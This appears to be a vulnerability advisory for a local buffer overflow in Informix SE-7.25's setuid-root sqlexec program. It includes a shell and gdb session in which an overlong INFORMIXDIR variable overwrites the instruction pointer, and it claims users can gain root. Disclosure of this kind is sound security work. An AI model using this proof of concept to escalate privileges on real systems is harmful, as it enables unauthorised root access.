|
COMMAND Informix local Buffer overflow SYSTEMS AFFECTED Informix SE-7.25 Platform: Only tested in Linux but can be exported to others. PROBLEM Juan Manuel Pascual Escriba [pask@uninet.edu] found following bug: Buffer overflow exists if INFORMIXDIR enviroment variable is defined with a size greater than 2023 bytes [pask@dimoni lib]$ ls -FAlsc total 2588 4 drwxrwxr-x 2 informix informix 4096 May 28 22:50 boom/ 1484 -rwsr-sr-x 1 root informix 1515480 Apr 20 22:09 sqlexec* 504 -rwxr-xr-x 1 informix informix 510283 Apr 20 22:09 sqlexecd* 596 -rwxr-xr-x 1 informix informix 606041 Apr 20 22:09 sqlrm* [pask@dimoni lib]$ export INFORMIXDIR=`perl -e \'print \"A\"x2023\'` [pask@dimoni lib]$ ./sqlexec [pask@dimoni lib]$ export INFORMIXDIR=`perl -e \'print \"A\"x2024\'` [pask@dimoni lib]$ ./sqlexec Segmentation fault [pask@dimoni lib]$ gdb ./sqlexec (gdb) r Starting program: /home/informix/SE-7.25/lib/./sqlexec Program received signal SIGSEGV, Segmentation fault. 0x41414141 in ?? () (gdb) (gdb) info registers ... esp 0x3fffed08 0x3fffed08 ebp 0x41414141 0x41414141 esi 0x3fffedf9 1073737209 edi 0x8191571 135861617 eip 0x41414141 0x41414141 ... IMPACT: ======= Users with exec perm over /lib/sqlexec can obtain euid=0 in a standard installation of Informix SE-7.25 SOLUTION Nothing yet.